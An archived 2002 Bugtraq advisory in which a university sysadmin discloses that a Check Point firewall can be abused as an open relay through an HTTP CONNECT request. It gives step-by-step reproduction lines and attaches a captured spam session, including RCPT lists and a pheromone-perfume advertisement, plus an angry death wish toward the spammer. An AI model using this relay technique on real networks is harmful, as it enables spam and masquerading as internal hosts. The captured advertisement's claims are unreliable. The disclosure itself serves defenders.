[24329] in bugtraq
UPDATE: [wcolburn@nmt.edu: SMTP relay through checkpoint firewall]
daemon@ATHENA.MIT.EDU (William D. Colburn (aka Schlake))
Tue Feb 19 18:50:51 2002
Date: Mon, 18 Feb 2002 17:09:59 -0700
From: "William D. Colburn (aka Schlake)" <wcolburn@nmt.edu>
To: bugtraq@securityfocus.com, Dan Lunceford <dan@nmt.edu>,
Ryan <ryan@nmt.edu>, support@aquilagroup.com
Cc: Madeline Navarrette <mnavarre@ts.checkpoint.com>
Message-ID: <20020218170959.B24198@nmt.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Checkpoint bounced my mail because I'm not a checkpoint customer, so I
contacted customer advocacy and resent it to a different address (this
message is copied to her as well). I was told that the issue would be
propogated to an appropriate person.
Please drop the old message and continue to hold this message until
Checkpoint responds.
I have a few updates to this issue that I have learned since I crafted
the original message.
I only need to give the "CONNECT" line, and nothing else. After the
second newline there is a pause and then the TCP stream is open. I seem
to be able to open any port on any machine I want *except* port 80. I
was able to telnet in to UNIX login with the firewall appearing as the
remote host. The initial machine I use (inside the firewall) does not
need to actually exist, I merely have to attempt to connect to an IP
address "inside" on port 80.
This whole give anyone outside a firewall the ability to masquerade on
any TCP service (except WWW) as a machine inside the domain of the
firewall. As far as I can tell there are no logs on this, and it is
hard to detect on the firewall. I found it by doing a tcpdump of all
packets and gradually narrowing down my filters until I was able to
"catch" an entire transaction.
----- Forwarded message from "William D. Colburn (aka Schlake)" <wcolburn@nmt.edu> -----
Step one: telnet to a machine behind the checkpoint firewall on port 80
Step two: Type the following:
>CONNECT mailserver.somecompany.com:25 / HTTP/1.0
>User-Agent: eeep
>Cache-Control: private,no-cache
>Pragma: no-cache
>
Step three: wait a moment for your SMTP banner to pop up.
I will attach an actual attack I caputured with tcpdump and ethereal.
The file is the result of an ethereal "Follow TCP stream".
I hate the person who did this to me and I hope they die a terrible
death.
--
William Colburn, "Sysprog" <wcolburn@nmt.edu>
Computer Center, New Mexico Institute of Mining and Technology
http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn
--AqsLC8rIMeq19msA
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename=checkpoint
From root@netpeep.nmt.edu Mon Feb 18 16:05:43 2002
Return-Path: <root@netpeep.nmt.edu>
Received: from netpeep.nmt.edu (netpeep.nmt.edu [129.138.250.10])
by mailhost.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hF0009872
for <schlake@nmt.edu>; Mon, 18 Feb 2002 16:05:43 -0700
Received: from netpeep.nmt.edu (localhost [127.0.0.1])
by netpeep.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hnA020585
for <schlake@nmt.edu>; Mon, 18 Feb 2002 16:05:43 -0700
Received: (from root@localhost)
by netpeep.nmt.edu (8.12.2/8.12.1/Submit) id g1IN5h8w020584
for schlake@nmt.edu; Mon, 18 Feb 2002 16:05:43 -0700
Date: Mon, 18 Feb 2002 16:05:43 -0700
From: root <root@netpeep.nmt.edu>
Message-Id: <200202182305.g1IN5h8w020584@netpeep.nmt.edu>
To: schlake@nmt.edu
Content-Length: 3580
Lines: 112
CONNECT mail2.freeuk.net:25 / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Cache-Control: private,no-cache
Pragma: no-cache
HELO hotmail.com
MAIL FROM: <pheros680506@hotmail.com>
RCPT TO: <renewinter@freeuk.com>
RCPT TO: <renewu@freeuk.com>
RCPT TO: <renfah@freeuk.com>
RCPT TO: <renfi11160@freeuk.com>
RCPT TO: <renfield13@freeuk.com>
RCPT TO: <renfield20@freeuk.com>
RCPT TO: <renfield94@freeuk.com>
RCPT TO: <renfrew@freeuk.com>
RCPT TO: <renfro33@freeuk.com>
RCPT TO: <reng3@freeuk.com>
RCPT TO: <renga@freeuk.com>
RCPT TO: <rengel293@freeuk.com>
RCPT TO: <rengel7495@freeuk.com>
RCPT TO: <rengelh946@freeuk.com>
RCPT TO: <rengers@freeuk.com>
RCPT TO: <rengised@freeuk.com>
RCPT TO: <rengl21068@freeuk.com>
RCPT TO: <rengl29048@freeuk.com>
RCPT TO: <rengl78818@freeuk.com>
DATA
Reply-To: <pheros680506@hotmail.com>
Message-ID: <004b71e11dcb$7144b8d2$6ac55bc3@mlpqff>
From: <pheros680506@hotmail.com>
To: <renewinter@freeuk.com>
Cc: <renewu@freeuk.com>,
<renfah@freeuk.com>,
<renfi11160@freeuk.com>,
<renfield13@freeuk.com>,
<renfield20@freeuk.com>,
<renfield94@freeuk.com>,
<renfrew@freeuk.com>,
<renfro33@freeuk.com>,
<reng3@freeuk.com>,
<renga@freeuk.com>,
<rengel293@freeuk.com>,
<rengel7495@freeuk.com>,
<rengelh946@freeuk.com>,
<rengers@freeuk.com>,
<rengised@freeuk.com>,
<rengl21068@freeuk.com>,
<rengl29048@freeuk.com>,
<rengl78818@freeuk.com>
Subject: A new fragrance (3437AlLf5-384bbsO4815hPeX5-01@27)
MiME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer:
Importance: Normal
Hi !
<HTML>
<head><title>Pheros attraction</title>
</head>
<BODY TEXT="#000000" LINK="#000000" VLINK="#000000" BGCOLOR="#7777FF">
<CENTER>
<TABLE WIDTH="650">
<TR>
<TD COLSPAN="2">
<FONT FACE="VERDANA, ARIAL">Notice: I have paid to be able to send you this e-mail. I do not intend to
cause you harm, fill up your mailbox or bother you needlessly. I am only
trying to reach those who are not as secure in their financial future as I
was when I first started looking for a way to earn money online. To be
removed, please go to the end of this e-mail. Please forgive me if you
receive this advertisement twice.<BR><BR>
</FONT>
</TD>
</TR>
<TR>
<TD VALIGN="TOP">
<FONT FACE="VERDANA, ARIAL">
Pheros is a lovely fragrance with a touch of human
pheromones, packaged in a exclusive crafted box.
Pheros is a foolproof tool of seduction, the scent and the
pheromones together make a foolproof combination.
No one can resist the wearer of this mysterious fragrance!
Pheros combines high tech science with the well-known
function of the scent of a luxorious perfume. <BR> The price is 19.95 USD/Bottle, including P&P! Payment is done via PayPal!
<BR>To order, klick the Paypal logo <A HREF="https://www.paypal.com/xclick/business=pheros3%40hotmail.com&item_name=Pheros&item_number=PherInt001&amount=19.95" TARGET="new"><IMG SRC="http://images.paypal.com/images/x-click-but02.gif" border="0"></A>
<BR>
</FONT>
</TD>
<TD>
<IMG SRC="http://pheros.freehosting.net/images/Mailbilden.jpg" border="2">
</TD>
</TR>
<TR>
<TD COLSPAN="2">
<BR>
<FONT FACE="Verdana, Arial">
To be removed from this mailing list, please reply to this message with the subjct "remove".
You will be BLOCKED from all mail from this site and your request will take effect within 24 hours.
</FONT>
</TD>
</TR>
</TABLE>
</CENTER>
</BODY>
</HTML>
[2901sDxs3-632TivA4099LrRl6-563cNjc6630cqwk8-434lwqh9794mwMr2-514eMAy1216cuz@71]
.
QUIT
--AqsLC8rIMeq19msA--
----- End forwarded message -----
--
William Colburn, "Sysprog" <wcolburn@nmt.edu>
Computer Center, New Mexico Institute of Mining and Technology
http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn
